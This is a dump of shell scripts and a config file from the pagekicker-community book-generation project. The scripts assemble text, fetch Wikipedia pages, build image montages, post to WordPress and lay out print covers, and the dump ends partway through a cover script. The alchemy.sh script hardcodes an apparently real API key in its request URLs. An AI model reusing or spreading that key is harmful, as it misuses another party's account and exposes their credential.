0.7218543291091919, "alphanum_fraction": 0.7251655459403992, "avg_line_length": 24.80341911315918, "blob_id": "8ab04c9467842fc4a24a51421cf374d3d7c40bb6", "content_id": "c0ebf87be77ebdc965ffd3c8c4edb880588fb38a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 3020, "license_type": "permissive", "max_line_length": 225, "num_lines": 117, "path": "/scripts/includes/document-assembler.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\nunformattedwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt`\nwordcount=`wc -w < tmp/$uuid/tmp.cumulative.txt | sed -e :a -e 's/\\(.*[0-9]\\)\\([0-9]\\{3\\}\\)/\\1,\\2/;ta' `\ncp tmp/$uuid/tmp.cumulative.txt tmp/$uuid/test.cumulative.txt\n\necho \"wordcount is\" $wordcount | tee --append $sfb_log\necho \"unformatted wordcount is\" $unformattedwordcount | tee --append $sfb_log\n\n# the html home page header and footer are already stored in includes/temptoc_*\n\ncase $booktype in\n\nReader)\n\n\techo $\"Foreword\" $p >> tmp/$uuid/shortdescription.html\n\n\tif [ $userdescription = \"yes\" ] ; then\n\n\t\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/shortdescription.html\n\t\tcat bin/xform-includes/userdescription.txt >> tmp/$uuid/lsi-shortdescription.txt\n\n\telse\n\n\t\ttrue\n\n\tfi\n\n\techo $\"This unique, differentiated, enhanced\" $booktype $\"in e-book format consists of\" $doccount $\"documents for a total of \"$wordcount $\"words.\" | tee --append tmp/$uuid/shortdescription.html tmp/$uuid/shortdescription.txt\n\n\techo $p >> tmp/$uuid/shortdescription.html\n\n\tcat ../conf/jobprofiles/seriesdescriptions/$seriesdescriptionfilename >> tmp/$uuid/shortdescription.html\n\n\techo $\"About the Author\"$p >> tmp/$uuid/shortdescription.html\n\n\tcat \"$authorbio\" >> tmp/$uuid/shortdescription.html\n\n\tcat \"$authorbio\" >> tmp/$uuid/book-description.txt\n\n\n\techo $\"Dedication\" \\n >> tmp/$uuid/dedication.txt\n\n\techo $\"Dedication\" $p >> tmp/$uuid/dedication.html\n\n #echo 
\"<center>\" >> tmp/$uuid/shortdescription.html\n\n\t# echo $angbr\"img src=\"$dq$dingbat$dq$endbr >> tmp/$uuid/shortdescription.html\n\n\t#echo \"</center>\" >> tmp/$uuid/shortdescription.html\n\n\t# cat includes/wordcloudpagefooter.html >> tmp/$uuid/shortdescription.html\n\n\t;;\n\n\tExplorer)\n\n\t\n\t;;\n\n\t*)\n\n\t;;\n\n\tesac\n\nebook-convert tmp/$uuid/shortdescription.html tmp/$uuid/shortdescription.txt\n\n# build ad section html for long description\n\ncat tmp/$uuid/stored-descriptions.html >> tmp/$uuid/longdescription.html\ncat tmp/$uuid/lsi-stored-descriptions.txt >> tmp/$uuid/lsi-longdescription.txt\n\n\n# add front and back matter to cumulative.html and txt files\n\n\n\ncase $booktype in\n\n\n\nReader)\n\ncat tmp/$uuid/html_header.html > tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/shortdescription.html >> tmp/$uuid/cumulative.html\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename >> tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/tmp.cumulative.html >> tmp/$uuid/cumulative.html\n\ncat tmp/$uuid/shortdescription.txt >> tmp/$uuid/cumulative.txt\n\ncat ../conf/jobprofiles/dedications/$dedicationfilename | html2text >> tmp/$uuid/cumulative.txt\n\n# filter cumulative.txt for [Image]\n\ncat tmp/$uuid/tmp.cumulative.txt | grep -v '\\[Image\\]$' >> tmp/$uuid/filtered.cumulative.txt\n\ncat tmp/$uuid/filtered.cumulative.txt >> tmp/$uuid/cumulative.txt\n\n;;\n\nExplorer) \n;;\n*)\n\nesac\n\necho $h1 $\"Appendix\" $h1end >> tmp/$uuid/cumulative.html\n\ncat includes/wikilicense.html >> tmp/$uuid/cumulative.html\n\necho $\"Appendix\" >> tmp/$uuid/cumulative.txt\n\necho \"\" >> tmp/$uuid/cumulative.txt\n\ncat includes/wikilicense.txt >> tmp/$uuid/cumulative.txt\n" }, { "alpha_fraction": 0.6808510422706604, "alphanum_fraction": 0.6978723406791687, "avg_line_length": 28.375, "blob_id": "c525fb92a09a1dfe4010d033cc408f4f6f4c4a21", "content_id": "75bebf1f35b4d5d38f6536661cae3702c61d5841", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 235, "license_type": "permissive", "max_line_length": 95, "num_lines": 8, "path": "/scripts/bin/epubcheck_dir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nfor file in *.epub\ndo\n\techo \"validating \" $file\n\tjava -jar /home/fred/sfb/sfb-latest/trunk/scripts/lib/epubcheck-3.0/epubcheck-3.0.jar \"$file\" \n\techo \"exit status for file\" $file \"was\" $? 
| tee --append epubcheck_err\ndone\n" }, { "alpha_fraction": 0.5622377395629883, "alphanum_fraction": 0.5790209770202637, "avg_line_length": 16.067416191101074, "blob_id": "c4dc51c28f6b08f02d8da82f4ccb094519d87236", "content_id": "68c624955ec5feeb235dbf1bd5a866bf1d18e4e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1430, "license_type": "permissive", "max_line_length": 106, "num_lines": 89, "path": "/scripts/wp-poster.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# shares text or markdown file to wordpress\n\n# input: text file as --txtinfile\n# output: wordpress draft\n# flags: --verbose \"y\" (requires the literal value y)\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires input text file name\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--txtinfile)\ntxtinfile=$2\nshift 2\n;;\n--txtinfile=*)\ntxtinfile=${1#*=}\nshift\n;;\n--title)\ntitle=$2\nshift 2\n;;\n--title=*)\ntitle=${1#*=}\nshift\n;;\n--WP_INSTALL)\nWP_INSTALL=$2\nshift 2\n;;\n--WP_INSTALL=*)\nWP_INSTALL=${1#*=}\nshift\n;;\n--WP_BIN)\nWP_BIN=$2\nshift 2\n;;\n--WP_BIN=*)\nWP_BIN=${1#*=}\nshift\n;;\n--verbose|-v)\nverbose=$2\nshift 2\n;;\n--verbose=*)\nverbose=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$txtinfile\" ]; then\n echo \"ERROR: option '--txtinfile[txtinfile]' not given. See --help\" >&2\n exit 1\nfi\nif [ ! \"$title\" ]; then\n echo \"ERROR: option '--title[title]' not given. 
See --help\" >&2\n exit 1\nfi\n\nif [ \"$verbose\" = \"y\" ] ; then\n\techo \"text infile is \"$txtinfile\nelse\n\ttrue\nfi\n\n\"$WP_BIN\" post \"$WP_INSTALL\" create \"$txtinfile\" --post_type=post --post_status=draft --post_title='title'\n" }, { "alpha_fraction": 0.6851063966751099, "alphanum_fraction": 0.6900709271430969, "avg_line_length": 38.13888931274414, "blob_id": "698735f2b1f17c70883e2ae5bd2466a0a0b7debc", "content_id": "41e59b37a70bfa945a0e4faf96133cfe95508e34", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1410, "license_type": "permissive", "max_line_length": 161, "num_lines": 36, "path": "/scripts/includes/fork-search-results.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\t# fetch the documents for this seed\n\n\twhile IFS='\t' read url title description\n\tdo\t\n\n\techo 'processing fetch lists' | tee --append $sfb_log\n\n\techo \"url is\" $url\n\twikiurl=$(echo $url | sed -e 's/.*wiki\\///')\n\techo \"wikiurl is\" $wikiurl\n\techo \"title is \" $title\n\techo \"description is\" $description\n\n\tfetchurlbase=\"http://\"$wikilocale\".wikipedia.org/w/api.php?action=parse&format=json&page=\"\n\techo \"fetchurlbase is\" $fetchurlbase | tee --append $sfb_log\n\tendfetchurl=\"&mobileformat=html&noimages=\"\n\tfetchurl=$fetchurlbase$wikiurl$endfetchurl\n\techo \"url to be fetched is\" $fetchurl | tee --append $sfb_log\n\n\tcurl --silent --connect-timeout 15 --max-time 45 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$count.json $fetchurl \n\n\t# xmlstarlet sel -t -v \"/api/parse/@*\" tmp/$uuid/$count.xml > tmp/$uuid/$count.html\n\n\tcat tmp/$uuid/$count.json | lib/jshon/jshon -e parse -e text -u | sed 's|<a[^>]* href=\"[^\"]*/|<a href=\"http://en.wikipedia.org/wiki/|g' > tmp/$uuid/$count.html\n\n\tebook-convert tmp/$uuid/$count.html tmp/$uuid/$count.txt --pretty-print 1> /dev/null\n\n\techo \"fetched document from\" $fetchurl \"and saved as tmp/\"$uuid/$count\".html and converted to txt using calibre\" | tee --append sfb_log\n\n\t# reports on status of fetches\n\n\techo \"number of docs fetched so far on seed\" $seed \"is \" $count \"out of \" $doccount | tee --append $sfb_log\n\n\tcount=$((count+1))\n\n\tdone <fetch/$uuid/safesearchresults.txt\n" }, { "alpha_fraction": 0.7543859481811523, "alphanum_fraction": 0.7602339386940002, "avg_line_length": 23.285715103149414, "blob_id": "93e342a8278fda447ecb4df3d6844cc54f62b1c0", "content_id": "78e5027143839c26d13fd6b0bd6408796f97b921", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 171, "license_type": "permissive", "max_line_length": 70, "num_lines": 7, "path": "/scripts/bin/lookup_acronyms.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nwhile read acronym\ndo\n\techo $acronym \n\twtf -f /usr/share/games/bsdgames/acronyms.climate $acronym >> results\ndone<~/Dropbox/methane/paper4/filtered_acronyms\n\n" }, { "alpha_fraction": 0.6702077984809875, "alphanum_fraction": 0.6858303546905518, "avg_line_length": 22.884328842163086, "blob_id": "321f7f068af12ab4be50b6615b763f1b99b00b93", "content_id": "be0505cc071a9405276ebe7c64182e6ed9233e1e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 6401, "license_type": "permissive", "max_line_length": 181, "num_lines": 268, "path": "/scripts/bin/montageur.sh", "repo_name": 
"fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# extracts, analyzes, and summarizes images from permissioned PDF documents\n\n# requires pdfimages, imagemagick, fdupes, pdftk\n\n# input: PDF file\n# output: unique jpgs, zip, montage\n\necho \"-M-M-M-M-M-M-M-M-M-M-M-M-M-M\" | tee --append $xform_log\necho \"starting montageur\"| tee --append $xform_log\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\n. $scriptpath\"includes/set-variables.sh\"\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nstarttime=$(( `date +%s` ))\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: montageur.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--maximages)\nmaximages=$2\nshift 2\n;;\n--maximages=*)\nmaximages=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--montageurdir)\nmontageurdir=$2\nshift 2\n;;\n--montageurdir=*)\nmontageurdir=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--tmpdir)\ntmpdir=$2\nshift 2\n;;\n--tmpdir=*)\ntmpdir=${1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$pdfinfile\" ]; then\n echo \"ERROR: option '--pdfinfile[pdfinfile]' not given. See --help\" >&2\n exit 1\nfi\n\nif [ ! 
\"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 $TMPDIR$uuid\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 755 $TMPDIR$uuid/montageur\nfi\n\nstopimagefolder=\"none\" #default\nmaximages=\"3\" #default\nthumbxsize=120 #default\nthumbysize=120 #default\noutfile=\"montage.jpg\"\nmontageurdir=\"montageur\"\n\npdfimages -j \"$pdfinfile\" $TMPDIR$uuid/\"$montageurdir\"/extracted_images\nls -la $TMPDIR$uuid\nif [ ls *.pbm &> /dev/null ] ; then\n\techo \"pbm files exist so converting to ppm\" | tee --append $xform_log\n\tfor f in $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.pbm; do\n\t convert ./\"$f\" ./\"${f%.pbm}.ppm\"\n\tdone\nelse\n\techo \"no pbm files\" | tee --append $xform_log\nfi\n\nif test -n \"$(shopt -s nullglob; echo $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm)\"\nthen\n echo \"image files were found in the target pdf\" | tee --append $xform_log\nelse\n echo \"montageur exiting, no image files were found in the target pdf\" | tee --append $xform_log\n exit 1\nfi\n\n\n # convert ppms to jpegs\n\necho \"about to mogrify ppms into jpgs\"\n\nmogrify -format jpg $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm\necho \"removing ppm files\"\n rm $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.ppm\n if [ ls *.pbm &> /dev/null ] ; then\n\techo \"removing pbm files\"\n\t# rm $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.pbm\nelse\n\techo \"no pbm files\" | tee --append $xform_log\nfi\n\n\n# remove small images\n\nfor i in $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg\ndo\n\tbytes=`identify -format \"%b\" $i | cut -dB -f1`\n\techo $bytes\n\tif [ \"$bytes\" -lt 1000 ] ; then\n\t\trm $i\n\t\techo \"removed small image\" $i\n\telse\n\t\ttrue\n\tfi\ndone\n\nls -la $TMPDIR$uuid\n\n# count images and create metadata\n\n# if maximages is provided then create a separate montage at the end using just those images\n\nimagecount=$(ls $TMPDIR$uuid/\"$montageurdir\"/*.jpg | wc -l)\necho \"imagecount is\" $imagecount\nls -S $TMPDIR$uuid/\"$montageurdir\"/*.jpg > $TMPDIR$uuid/\"$montageurdir\"/listbysize.txt\n\nls -la $TMPDIR$uuid\n# delete dupes\nfdupes $TMPDIR$uuid/.\n\n# kluge move stop images into working directory\n\nif [ \"$stopimagefolder\" != \"none\" ] ; then\n\n\techo \"stopimagefolder was\" $stopimagefolder | tee --append $xform_log\n\tcp $stopimagefolder/* .\n\tfdupes -r . 
> $TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\tsed -i '/^$/d' $TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\twhile read -r filename; do\n\techo \"$filename is filename\"\n\t rm \"$filename\"\n\tdone <$TMPDIR$uuid/\"$montageurdir\"/dupelist.txt\n\nelse\n\n\techo \"no stopimage folder\" | tee --append $xform_log\n\nfi\n\nzip $TMPDIR$uuid/\"$montageurdir\"/extracted_images.zip $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg\n\necho \"$pdfinfile is pdfinfile\"\nls -la $TMPDIR$uuid\n\npdftk \"$pdfinfile\" dump_data output | grep -E \"Figure*|Table*|Map*|Illustration*\" | sed 's/BookmarkTitle//' > $TMPDIR$uuid/\"$montageurdir\"/figures_metadata.txt\n\n# build montage image\n\nmontage -density 300 -units pixelsperinch $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg -geometry '800x800>+4+3' $TMPDIR$uuid/\"$montageurdir\"/$outfile\ncp $TMPDIR$uuid/\"$montageurdir\"/$outfile $TMPDIR$uuid/$outfile\n\nmontage -density 300 -units pixelsperinch $TMPDIR$uuid/\"$montageurdir\"/extracted_images*.jpg -tile 3x4 -geometry '800x800>+3+4' $TMPDIR$uuid/\"$montageurdir\"/portrait_%d.jpg\ncp -R $TMPDIR$uuid/\"$montageurdir\"/portrait* $TMPDIR$uuid\n\n# build optional top N images montage\n\nif [ \"$maximages\" != \"no\" ] ; then\n\n\techo \"building additional image from top N\"\n\tmkdir -p -m 755 $TMPDIR$uuid/montageurtopn\n\n\t# put N files in tmp directory\n\tcd $TMPDIR$uuid/\"$montageurdir\"\n\tcp `find ./extr*.jpg -maxdepth 1 -printf '%s %p\\n'|sort -nr|head -n \"$maximages\" | cut -d/ -f2` ../montageurtopn\n\tcd $scriptpath\n\t# build the montage\n\n\tmontage -density 300 -units pixelsperinch $TMPDIR$uuid/montageurtopn/extracted_images*.jpg -geometry '2150x900>+4+3' -tile 1x\"$maximages\" $TMPDIR$uuid/montageurtopn/montagetopn.jpg\n\nelse\n\techo \"not building top N images montage\" | tee --append $xform_log\n\nfi\n\necho \"montageur complete\" | tee --append $xform_log\n" }, { "alpha_fraction": 0.6590909361839294, "alphanum_fraction": 0.6590909361839294, "avg_line_length": 21, "blob_id": "aaa310d1353950f8fee2e66006201d9066239c5e", "content_id": "71d73b62fbe1a109c77babb2a495689c0b2e5a4d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 44, "license_type": "permissive", "max_line_length": 31, "num_lines": 2, "path": "/scripts/bin/somescript.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"test\" > ~/somescript.test\n" }, { "alpha_fraction": 0.7535771131515503, "alphanum_fraction": 0.7625861167907715, "avg_line_length": 36, "blob_id": "927410f0608f6bd88fd1288783a4fd4830e29793", "content_id": "75f1df48c137fdbe1730756c0b725da46d8f896d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1887, "license_type": "permissive", "max_line_length": 106, "num_lines": 51, "path": "/conf/config_defaults.txt", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# configuration file\n# all these values in this block should be customized\nMACHINE_NAME=\"$hostname\" # can be anything\nenvironment=\"PageKicker-installation\" # can be 
anything\nTMPDIR=\"/tmp/pagekicker/\"\nSFB_HOME=\"/home/$USER/pagekicker-community/\"\nLOCAL_DATA=\"$SFB_HOME\"local-data/\nSFB_MAGENTO_HOME=\"/home/$USER/magento/\"\nSFB_PHP_BIN=\"/usr/bin/php\"\nJAVA_BIN=\"/usr/bin/java\"\nPYTHON_BIN=\"/usr/bin/python3\"\nPYTHON27_BIN=\"/usr/bin/python\"\nNER_BIN=\"$scriptpath/lib/stanford-ner-2020-11-17\"\nPANDOC_BIN=\"/usr/bin/pandoc\"\nSFB_VERSION=`git describe`\nCOMMUNITY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\n#MY_GITHUB_REPO=\"https://github.com/fredzannarbor/pagekicker-community\"\nUSER_HOME=\"/home/$USER/\"\nLOCAL_USER=\"$USER\"\nHOSTDIR=\"/home/$USER\"\nAPACHE_ROOT=\"/var/www/html/\"\nWEB_HOST=\"http://127.0.0.1/\"\nWEB_ROOT=\"/var/www/html/pk-html/\" # place where html files generated by PK for users are stored\nWEB_SCRIPTPATH=\"scripts/\"\nLOCAL_MYSQL_PATH=\"\"\nLOCAL_MYSQL_USER=\"user\"\nLOCAL_MYSQL_PASSWORD=\"$PASSWORD\"\n\nimport_available_on_machine=\"no\" # is there a working catalog connection\n\n# following paths dependent on variables specified above\n# and should not need to be changed\n\nmetadatatargetpath=$SFB_MAGENTO_HOME\"var/import/\" # these all follow Magento file structure\nmediatargetpath=$SFB_MAGENTO_HOME\"media/import/\"\nmediaarchivetxt=$SFB_MAGENTO_HOME\"media/archive/txt/\"\nWEBFORMSXML_HOME=$SFB_MAGENTO_HOME\"media/webforms/xml/\"\nWEBFORMSHOME=$SFB_MAGENTO_HOME\"media/webforms/\"\n\nscriptpath=$SFB_HOME\"scripts/\" # all PK programs run from $scriptpath unless special circumstances require\nconfdir=$SFB_HOME\"conf/\"\ntextpath=$SFB_HOME\"txt/\"\nimagedir=\"images/\"\nlogdir=$LOCAL_DATA\"logs/uuids/\"\nsfb_log=$logdir\"sfb_log.txt\"\nxformlog=$logdir$uuid\"/xformlog.txt\"\ntodaysarchivefolder=$(date +\"%Y%m%d\")\nsfb_log_archive=$LOCAL_DATA\"logs/sfb_log_archive.log\"\n" }, { "alpha_fraction": 0.8105263113975525, "alphanum_fraction": 0.8252631425857544, "avg_line_length": 51.77777862548828, "blob_id": "25dcd6256746c88f34ecf94e4179e8daa9250a2cd", "content_id": "ad9250a01168d6a22bcac1fd7a1a605e8bce6e79", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 475, "license_type": "permissive", "max_line_length": 109, "num_lines": 9, "path": "/test/test-mkdir.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "mkdir -p local-data/bibliography local-data/bibliography/imprints local-data/bibliography/imprints/pagekicker\nmkdir -p local-data/bibliography/robots local-data/bibliography/robots/default\nmkdir -p local-data/bibliography/yaml\nmkdir -p local-data/jobprofile_builds/default\nmkdir -p local-data/logs/uuids\nmkdir -p local-data/seeds/history\nmkdir -p local-data/seeds/SKUs\nmkdir -p local-data/SKUs\necho \"1000001\" > local-data/SKUs/sku_list\ntouch local-data/bibliography/robots/default/default_titles.txt\n" }, { "alpha_fraction": 0.72119140625, "alphanum_fraction": 0.7294921875, "avg_line_length": 63, "blob_id": "4db937cbe666eb198fb64ddf69659073f10e28ec", "content_id": "858cbb3ffebc74e7d9e802f2b23087f86addf9a3", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2048, "license_type": "permissive", "max_line_length": 233, "num_lines": 32, "path": "/scripts/includes/alchemy.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"running alchemy module\" | tee --append $sfb_log\n\necho \"placing documents for analysis on public web server for access by Alchemy\" | tee --append 
$sfb_log\n\n\nrsync -av -e \"ssh -i/home/fred/Documents/certificates/restorepk.pem\" $scriptpath\"tmp/\"$uuid/cumulative.html \"[email protected]:/opt/bitnami/apache2/htdocs/alchemy-staging/\"$sku\"cumulative.html\"\nrsync -av -e \"ssh -i/home/fred/Documents/certificates/restorepk.pem\" $scriptpath\"tmp/\"$uuid/cumulative.txt \"[email protected]:/opt/bitnami/apache2/htdocs/alchemy-staging/\"$sku\"cumulative.txt\"\n\n# the request URLs are quoted so the & in the query string is not treated as a shell operator\ncurl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$sku\"tags.xml\" \"http://access.alchemyapi.com/calls/url/URLGetRankedConcepts?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=${WEB_HOST}alchemy-staging/${sku}cumulative.html\" \n\ncurl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$sku\"namedentities.xml\" \"http://access.alchemyapi.com/calls/url/URLGetRankedNamedEntities?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=${WEB_HOST}alchemy-staging/${sku}cumulative.html\"\n\t\nxml2 < \"tmp/$uuid/${sku}namedentities.xml\" > \"tmp/$uuid/${sku}namedentities.csv\"\n\ncat tmp/$uuid/$sku\"namedentities.csv\" | grep 'text' | cut -d= -f 2 > tmp/$uuid/$sku\"namedentities.txt\"\n\t\n curl --connect-timeout 30 --max-redirs 1 --junk-session-cookies -o tmp/$uuid/$sku\"keywords.xml\" \"http://access.alchemyapi.com/calls/url/URLGetRankedKeywords?apikey=50bc69376c77ff5ca754572ea483a77c037320d8&url=${WEB_HOST}alchemy-staging/${sku}cumulative.txt\"\n\t\t\t\nif grep -q '<status>ERROR</status>' tmp/$uuid/$sku\"keywords.xml\" ; then\n\techo \"Alchemy API error, product tags could not be retrieved for seed\" $seed | tee --append $sfb_log\n\t# save seeds so the tags can be added later when the API is working\n\techo $seed | tee --append logs/tags-not-retrieved.txt\n\techo \"tags were not available for this document\" > tmp/$uuid/$sku\"keywords.txt\"\nelse\n\t\t\n\txml2 < \"tmp/\"$uuid\"/\"$sku\"keywords.xml\" > \"tmp/\"$uuid\"/\"$sku\"keywords.csv\"\n\n\tcat \"tmp/\"$uuid/$sku\"keywords.csv\" | grep 'text' | cut -d= -f 2 > \"tmp/\"$uuid\"/\"$sku\"keywords.txt\"\n\nfi\n\necho \"fetched keywords from Alchemy and saved as\" $sku\"keywords.txt\" | tee --append $sfb_log\n" }, { "alpha_fraction": 0.7376319169998169, "alphanum_fraction": 0.7583502531051636, "avg_line_length": 41.159183502197266, "blob_id": "b1d80b6df2bcca7d215a2433146325eb787442e0", "content_id": "52d3bb1d03a1e00677ad22109088e0999c1cdb78", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 10329, "license_type": "permissive", "max_line_length": 353, "num_lines": 245, "path": "/scripts/includes/print-cover-v2.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#initialize print variables\n\n# this is for case bound only - most of these values would need to be conditional to support other bindings\n\n\n\tprint_horizontal_trim=2438 # 8.125 inches for 8.5 inch books\n\tprint_vertical_trim=3300\n\tprint_top_height=$((print_vertical_trim / 4))\n\tprint_bottom_height=$((print_vertical_trim / 10))\n\tprint_label_text_width=$((print_horizontal_trim - 225))\n\toutsidebleed=187\n\tinsidebleed=204\n\ttopbleed=217\n\tbottombleed=225\n\ttextsafety=150\n\tuserprovidedprintISBN=9781608880416 # dev only\n\tspinepixels=131 #dev only\n\n# create directory for print images\n\n\tcd images/$uuid ; mkdir print ; echo \"created directory images/$uuid/print\" ; cd $scriptpath ; echo \"changed directory back to \" $scriptpath | tee --append $sfb_log\n\n# calculate dimensions\n\n\t# calculate spine dimensions (we must know 
the spine before we can do the canvas!)\n\n\t\techo \"checking sku is \" $sku \"and path to pdf is \" $mediatargetpath$uuid\"/\"$sku\"print.pdf\" \n\n\t\tpdfpagecount=`pdftk $mediatargetpath$uuid/$sku\"print.pdf\" dump_data output | grep -i NumberOfPages | cut -d\":\" -f2 | sed '/^$/d'`\n\n\t\techo \"pdf page count is\" $pdfpagecount\n\n\t\t# get rid of space and save $spinepixels as variable\n\n\t# calculate size of canvas\n\n\t\tcanvaswidth=$(( $print_horizontal_trim * 2 + $spinepixels + $outsidebleed + $insidebleed + $insidebleed + $outsidebleed + 10 ))\n\t\tcanvasheight=$(( $topbleed + $print_vertical_trim + $bottombleed + 10 ))\n\n\t\techo \"calculated canvaswidth as \"$canvaswidth\n\t\techo \"calculated canvasheight as \"$canvasheight\n\n\t# calculate safe areas on front and back page\n\n\t\tsafepagewidth=$(( $print_horizontal_trim - $textsafety - $textsafety ))\n\t\tsafepageheight=$(( $print_vertical_trim - $textsafety ))\n\n\t\techo \"calculated safepagewidth as\" $safepagewidth\n\t\techo \"calculated safepageheight as\" $safepageheight\n\n\t# calculate spine\n\n\t\tif [ \"$spinepixels\" -lt 106 ] ; then\n\t\t\tspinesafety=10\n\t\telse\n\t\t\tspinesafety=18\n\t\tfi\n\n\t\techo \"spinesafety is\" $spinesafety\n\n\t\tsafespinetitlewidth=$(( $spinepixels - $spinesafety - $spinesafety ))\n\n\t\techo \"safespinetitlewidth is\" $safespinetitlewidth\n\n\t\tsafespinetitleheight=$(( $safepageheight / 2 ))\n\n\t\techo \"calculated safespinetitleheight as \" $safespinetitleheight\n\n\t\tspineleftmargin=$(( $outsidebleed + $insidebleed + $print_horizontal_trim + $spinesafety * 2 ))\n\n\t\techo \"calculated spineleftmargin as bleeds + page width + spine safety for \" $spineleftmargin\n\t\t\n\t\tspinelogotypebegin=$(( $print_horizontal_trim - 600 ))\n\n\t# front page calculations\n\n\t\tfrontpageflushleftmargin=$(( $outsidebleed + $print_horizontal_trim + $insidebleed + $spinepixels + insidebleed ))\n\n\t\techo \"calculated frontpageflushleftmargin as\" $frontpageflushleftmargin\n\n\t\t# there's always a cushion around top and bottom text\n\n\t\tfrontpagetopcushion=150\n\n\t\tfrontpagebottomcushion=0\n\n\t\techo \"frontpagetopcushion is \" $frontpagetopcushion\n\t\techo \"frontpagebottomcushion is \" 